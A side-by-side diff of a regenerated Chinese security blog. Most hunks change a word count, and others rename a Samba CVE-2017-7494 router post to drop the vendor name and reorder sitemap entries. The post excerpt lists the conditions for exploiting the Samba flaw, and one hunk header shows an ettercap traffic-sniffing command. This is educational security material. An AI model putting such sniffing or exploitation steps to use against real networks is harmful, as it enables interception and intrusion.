<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -474,7 +474,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -474,7 +474,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -526,7 +526,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -2293,7 +2293,7 @@ MiniUPnP项目提供了支持UPnP IGD(互联网网关设备)规范的软件。
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -733,7 +733,7 @@ WinDbg
<h1 class="post-title" itemprop="name headline"> <h1 class="post-title" itemprop="name headline">
<a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url">小米路由器与Samba漏洞CVE-2017-7494</a></h1> <a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url">某厂商路由器与Samba漏洞CVE-2017-7494</a></h1>
<div class="post-meta"> <div class="post-meta">
@ -785,7 +785,7 @@ WinDbg
<span id="/2019/03/25/Samba-CVE/" class="leancloud_visitors" data-flag-title="小米路由器与Samba漏洞CVE-2017-7494"> <span id="/2019/03/25/Samba-CVE/" class="leancloud_visitors" data-flag-title="某厂商路由器与Samba漏洞CVE-2017-7494">
<span class="post-meta-divider">|</span> <span class="post-meta-divider">|</span>
<span class="post-meta-item-icon"> <span class="post-meta-item-icon">
<i class="fa fa-eye"></i> <i class="fa fa-eye"></i>
@ -808,7 +808,7 @@ WinDbg
</span> </span>
<span title="字数统计"> <span title="字数统计">
1.6k 字 1.7k 字
</span> </span>
@ -822,7 +822,7 @@ WinDbg
</span> </span>
<span title="阅读时长"> <span title="阅读时长">
6 分钟 7 分钟
</span> </span>
</div> </div>
@ -845,11 +845,13 @@ WinDbg
小米路由器与Samba漏洞CVE-2017-7494漏洞描述Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录会导致服务器加载并执行指定的库文件。具体执行条件如下 漏洞描述Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录会导致服务器加载并执行指定的库文件。具体执行条件如下
服务器打开了文件/打印机共享端口445让其能够在公网上访问 服务器打开了文件/打印机共享端口445让其能够在公网上访问
共享文件拥有写 共享文件拥有写入权限
恶意攻击者需猜解Samba服务端共享目录的
... ...
<!--noindex--> <!--noindex-->
<div class="post-button text-center"> <div class="post-button text-center">
@ -2347,7 +2349,7 @@ ettercap嗅探智能设备和网关之间的流量sudo ettercap -i ens33 -T -q
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -795,7 +795,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>



@ -1,6 +1,13 @@
<?xml version="1.0" encoding="UTF-8"?> <?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"> <urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
<url>
<loc>https://cool-y.github.io/2019/03/25/Samba-CVE/</loc>
<lastmod>2019-07-27T06:39:41.484Z</lastmod>
</url>
<url> <url>
<loc>https://cool-y.github.io/2019/07/10/x86basic/</loc> <loc>https://cool-y.github.io/2019/07/10/x86basic/</loc>
@ -155,13 +162,6 @@
</url> </url>
<url>
<loc>https://cool-y.github.io/2019/02/22/qq%E6%95%B0%E6%8D%AE%E5%BA%93%E7%9A%84%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86/</loc>
<lastmod>2019-04-15T07:35:38.082Z</lastmod>
</url>
<url> <url>
<loc>https://cool-y.github.io/2019/01/16/wifi%E5%8D%8A%E5%8F%8C%E5%B7%A5%E4%BE%A7%E4%BF%A1%E9%81%93%E6%94%BB%E5%87%BB%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/</loc> <loc>https://cool-y.github.io/2019/01/16/wifi%E5%8D%8A%E5%8F%8C%E5%B7%A5%E4%BE%A7%E4%BF%A1%E9%81%93%E6%94%BB%E5%87%BB%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/</loc>
@ -170,14 +170,21 @@
</url> </url>
<url> <url>
<loc>https://cool-y.github.io/2000/01/01/hello-world/</loc> <loc>https://cool-y.github.io/2019/02/22/qq%E6%95%B0%E6%8D%AE%E5%BA%93%E7%9A%84%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86/</loc>
<lastmod>2019-04-15T07:35:38.082Z</lastmod>
</url>
<url>
<loc>https://cool-y.github.io/2019/03/23/auto-send-WX/</loc>
<lastmod>2019-04-15T07:35:38.081Z</lastmod> <lastmod>2019-04-15T07:35:38.081Z</lastmod>
</url> </url>
<url> <url>
<loc>https://cool-y.github.io/2019/03/23/auto-send-WX/</loc> <loc>https://cool-y.github.io/2000/01/01/hello-world/</loc>
<lastmod>2019-04-15T07:35:38.081Z</lastmod> <lastmod>2019-04-15T07:35:38.081Z</lastmod>
@ -190,11 +197,4 @@
</url> </url>
<url>
<loc>https://cool-y.github.io/2019/03/25/Samba-CVE/</loc>
<lastmod>2019-04-15T07:35:38.080Z</lastmod>
</url>
</urlset> </urlset>


@ -499,7 +499,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -310,7 +310,7 @@
<a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url"> <a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url">
<span itemprop="name">小米路由器与Samba漏洞CVE-2017-7494</span> <span itemprop="name">某厂商路由器与Samba漏洞CVE-2017-7494</span>
</a> </a>
@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -310,7 +310,7 @@
<a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url"> <a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url">
<span itemprop="name">小米路由器与Samba漏洞CVE-2017-7494</span> <span itemprop="name">某厂商路由器与Samba漏洞CVE-2017-7494</span>
</a> </a>
@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -465,7 +465,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -551,7 +551,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -499,7 +499,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -499,7 +499,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -499,7 +499,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -499,7 +499,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -310,7 +310,7 @@
<a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url"> <a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url">
<span itemprop="name">小米路由器与Samba漏洞CVE-2017-7494</span> <span itemprop="name">某厂商路由器与Samba漏洞CVE-2017-7494</span>
</a> </a>
@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>


@ -473,7 +473,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>